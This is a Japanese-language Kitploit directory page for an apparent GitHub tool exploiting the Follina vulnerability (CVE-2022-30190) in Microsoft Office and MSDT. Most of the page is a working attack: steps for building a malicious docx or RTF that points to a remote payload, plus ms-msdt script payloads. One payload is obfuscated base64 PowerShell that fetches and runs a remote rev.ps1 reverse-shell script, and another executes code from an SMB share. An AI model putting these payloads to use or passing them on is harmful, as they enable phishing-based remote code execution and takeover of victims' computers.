Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
MS-MSDT-Office-RCE-Follina — CVE-2022-30190 | MS-MSDT Follina ワンクリック | Kitploit
ツール/GitHubGitHub/0xflagplz/ms-msdt-office-rce-follina
フィッシングツールペイロード生成エクスプロイト横移動ウェブアプリケーション悪用コマンド&コントロール
GitHub0xflagplz/ms-msdt-office-rce-follina

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina ワンクリック

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
20124年前Kitploit レビュー済み

MS-MSDT-Office-RCE-Follina

CVE-2022-30190 | MS-MSDT Follina ワンクリック

  1. Docxファイルを作成します。
  2. Docxファイル内で、挿入 > オブジェクト > ビットマップイメージ > OK を選択します。
  3. 起動したペイントアプリケーションで、ペイントファイルを保存します。
  4. Docxファイルを保存します。
  5. ファイルをアーカイブとして開きます(7Zipを使用: 右クリック > 7Zip > アーカイブを開く)。
  6. \Word\ から Document.xml を、\word_rels\ から document.xml.rels ファイルをコピーします。
  7. \word_rels\Document.xml.rels を開き/編集し、"Target=" 内の宛先を、ペイロードを取得するリモートの宛先に置き換えます。また、XMLタグに "TargetMode="External"" を追加します。
  8. Docxファイルに圧縮し直します(送る > 圧縮(zip形式)フォルダー | ファイルの種類を zip から docx/doc に変更)。

RTFファイルタイプ

以下のパラメータ手順/パラメータを使用してdocxを保存した後、DocxをRTFとして保存します。

また、word/document.xml の <o:OLEObject> 要素に以下の要素を追加する場合:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

再圧縮の手順は、JohnHammondのPythonスクリプトでも確認できます: ~ 元のOfficeファイルを再構築 ~

root@kitploit:~
shutil.make_archive(args.output, "zip", doc_path)
os.rename(args.output + ".zip", args.output)

参考: https://github.com/JohnHammond/msdt-follina/blob/main/follina.py


ペイロード

基本的なCalc実行:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

Start-Process('calc') を以下のように置き換えることも可能:

IEX('calc.exe')


SMB共有実行:

root@kitploit:~
<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=/../../$(\\\\taretip\\share\\poc)/.exe)\"";
</script>

PS1ファイルの読み込み:

root@kitploit:~
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cG93ZXJzaGVsbC5leGUgLWMgImlleCAoaXdyIGh0dHA6Ly8xOTIuMTY4LjE5OC4xMjgvcmV2LnBzMSAtVXNlQmFzaWNQYXJzaW5nKSIK'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>  

デコード後: Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("powershell.exe -c "iex (iwr http://192.168.198.128/rev.ps1 -UseBasicParsing)""))


Apache2のaccess.logには、ファイルを開くと接続が表示されるはずです

ログの例

ツールをダウンロード